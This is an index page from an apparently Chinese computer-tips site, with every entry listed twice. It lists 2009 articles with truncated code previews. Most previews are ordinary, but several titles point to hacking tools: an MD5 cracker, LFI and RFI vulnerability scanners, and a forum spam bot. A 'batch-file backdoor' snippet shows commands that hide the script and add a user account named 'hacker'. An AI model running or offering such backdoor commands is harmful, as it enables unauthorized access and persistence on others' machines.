首页 电脑电脑学堂

电脑学堂

  • VBS sendkeys 模拟击键操作
      ' ======================================  ' VBS 中 SendKeys 模拟键盘击键  ' 2009-07-26  ' 刘林  ' =========...
    2009-8-3 12:44 614
  • perl版MD5破解工具
      ###################################  #cracker md5 (perl)  ###################################  #!/...
    2009-8-3 10:48 592
  • perl版MD5破解工具
      ###################################  #cracker md5 (perl)  ###################################  #!/...
    2009-8-3 10:48 486
  • Perl版LFI_scanner
    #!/usr/bin/perl #programmer:kiddies or peneter@darkc0de ([email protected])##special thanks: m...
    2009-8-3 10:40 634
  • Perl版LFI_scanner
    #!/usr/bin/perl #programmer:kiddies or peneter@darkc0de ([email protected])##special thanks: m...
    2009-8-3 10:40 749
  • PHP版的RFI漏洞扫描工具代码
    <?php     /* regex per individuare le inclusioni */     $escan...
    2009-8-3 10:19 823
  • PHP版的RFI漏洞扫描工具代码
    <?php     /* regex per individuare le inclusioni */     $escan...
    2009-8-3 10:19 611
  • 批处理写的后门
    @echo off  @attrib +s + r xyt.bat  @net user xyt hacker /add  @net loc...
    2009-8-2 13:21 723
  • 批处理写的后门
    @echo off  @attrib +s + r xyt.bat  @net user xyt hacker /add  @net loc...
    2009-8-2 13:21 514
  • vbs-论坛自动灌水器IE版代码
    '注释由woyigui加入set wind9=createobject("scripting.filesystemobject")if wind9.fileexists("wind.txt")=fal...
    2009-8-2 13:15 529
  • vbs-论坛自动灌水器IE版代码
    '注释由woyigui加入set wind9=createobject("scripting.filesystemobject")if wind9.fileexists("wind.txt")=fal...
    2009-8-2 13:15 646
  • select语句的执行顺序
    标准的 SQL 的解析顺序为:(1).FROM 子句, 组装来自不同数据源的数据(2).WHERE 子句, 基于指定的条件对记录进行筛选(3).GROUP BY 子句, 将数据划分为多个分组(4).使...
    2009-8-2 11:26 558
  • select语句的执行顺序
    标准的 SQL 的解析顺序为:(1).FROM 子句, 组装来自不同数据源的数据(2).WHERE 子句, 基于指定的条件对记录进行筛选(3).GROUP BY 子句, 将数据划分为多个分组(4).使...
    2009-8-2 11:26 697
  • JS 输入字数判断实现代码
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x...
    2009-8-1 13:07 1031
  • PHP语法速查表手册
    php 函式索引 967 个函式共有 967 个函式 Abs: 取得绝对值。 Acos: 取得反余弦值。 ada_afetch: 取得资料库的传回列。 ada_autocommit: 开关自动更动功...
    2009-8-1 12:51 860
返回顶部